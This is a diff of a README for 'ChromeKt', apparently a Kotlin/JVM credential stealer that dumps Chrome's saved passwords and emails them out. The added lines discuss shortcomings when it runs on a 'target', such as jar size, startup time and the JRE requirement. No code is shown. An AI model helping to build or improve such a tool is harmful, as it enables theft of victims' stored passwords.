zeon256/ChromeKt/README.md

 # ChromeKt
 Dumps google chrome passwords and sends them to your email.

+## Problems
+- Jar file is 10mb
+- Runs on JVM, -> slow startup.
+Need to improve startup to run effectively
+- Cannot run if target does not have JRE

 ## How to use?
 Clone and import folder from intelliJ.
 Make sure JDK is installed.